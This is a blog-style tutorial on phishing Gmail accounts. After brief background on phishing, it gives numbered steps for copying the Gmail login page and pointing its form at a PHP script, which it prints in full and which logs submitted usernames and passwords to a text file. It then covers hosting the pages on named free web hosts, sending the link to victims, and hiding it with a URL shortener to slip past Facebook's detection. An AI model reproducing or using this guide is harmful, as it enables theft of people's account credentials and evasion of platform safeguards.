How to hackers hack Gmail password using phishing attack method-Gmail Hacking Secrets-2015


 
Hello Friends,

Many of my friends ask me via email that "how to hack Gmail  password with phishing attack" because it is most useful trick to get user name and password of victim or your friend's Gmail account .Phishing is the most commonly used method to hack Gmail. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , facebook, MySpace etc. The victim is fooled to believe the fake Gmail page to be the real one and enter his/her password. But once the user attempts to sign in through these pages, his/her Gmail sign in  details are stolen away. I recommend  hack any account by phishing attack  since it is the easiest one .
In this tutorial hacking Gmail using phishing method,you  learn how hackers access your Gmail account using phishing and also you learn how you can created phishing pages.

***what is phishing according to wikipedia***


 Phishing is an old method of e-mail fraud that is used to gather personal and financial information from the recipients. phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.Phishing is an example of a social engineering technique.

***History and current status of phishing***


A phishing technique was described in detail in a paper and presentation delivered to the International HP Users Group, Interex.The first recorded mention of the term "phishing" is found in the hacking tool AOHell (according to its creator), which included a function for attempting to steal the passwords or financial details of America Online users. According to Ghosh, there were 445,004 attacks in 2012 as compared to 258,461 in 2011 and 187,203 in 2010, showing that phishing has been increasingly threatening individuals.

 


A recent and popular case of phishing is the suspected Chinese phishing campaign targeting Gmail accounts of highly ranked officials of the United States and South Korean Government, military, and Chinese political activists. The Chinese government continues to deny accusations of taking part in cyber-attacks from within its borders, but evidence has been revealed that China own People Liberation Army has assisted in the coding of cyber-attack software


***Step by step guide to hack Gmail account using phishing ***



step:1.)
first of all Go to the Gmail.com

step:2)  and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )




                                         
step:3) now a pop up window  will be open which contain a source code of Gmail  page, And Copy  all the code using ctrl+c




step:4)
Now open the notepad and past all code here which copy in step 3


 step:5) now press CTRL+F,and type ACTION.(see bellow picture)




step:6)
You will have to search action again and again till you get like bellow code
                                      
action="https://www.google.com/accounts/SeviceLoginAuth"

 

How to hackers hack Gmail password using phishing attack method-Gmail Hacking Secrets

step:7)
After that delete all the text written in blue color and instead of it write hack.php.then it will look like.( see bellow given picture)

                                                 action="hack.php"

 



step:8) Now save it on your desktop with the name index.htm,not index.html,remember.

step:9) Now your phishing page is ready.

 



step:9) now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.

header ('Location:http://www.google.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

note: I use hack.php in step 7 that's why we need to use same name in step 9

step:10)
You have successfully created two files

  •  index.htm 
  • hack .php,

step:11)
now you need to upload these two files in free web hosting site some free web hosting site given bellow

  • www.my3gb.com 
  • www.000webhost.com
  • www.freewebhosting.com 
  • www.xhosting.com

I prefer my3gb.com because it is easy to use so here i am going to use my3gb.com in next steps

step:12) first of all go to www.my3gb.com and click on register button which is located in upper side bar.
 

step:13) now simply fill all necessary information in registration form
 


step:14) when your account completely setup simply login with your username and password
 

step:15) when you open your account you see control panel  like bellow picture ,now click on file manager.



step:16) now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files  button and upload both files there after uploading it look like bellow picture.
 


step:17)
now click on index.htm file you see fake gmail page simply copy the URL from your web browser URL address bar .your link look like bellow :
 

http://www.yourusername.my3gb.com/index.htm 
step:18) now you almost done simply send this link to your victim or friends .
 
step:19) when victim open that link he see fake gmail page which look like real and enter there username and password and hit login his password send to your my3gb account.
 
step:20) for seeing password simply go to my3gb.com >>control panel >>file manager,and here you see new file with name usernames.txt .open it and see the password.
 

warning :

you are not able to send your phishing link to friends in facebook because facebook detect it and give warning to delete that link.

if you want to send your link via facebook or other social networking site then  you need to use url shortning I prefer to use www.tinyurl.com because it is easy to use and facebook security not detect it easily.if tinyurl not allowed phishing link then try another websites. if you don't know how to short your link for facebook follow bellow steps

  • 2) past your Phishing url in the box and hit make tiny url button.
  • 3) after that you get your short link simply send that link to your friends.

that's  it friends
 

if you faced any problem feel free ask me via comment box.

DISCLAIMER: YOU IMPLEMENT ALL THE INFORMATION PROVIDED IN THIS ARTICLE AT YOUR OWN RISK. USAGE OF SPYWARE WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!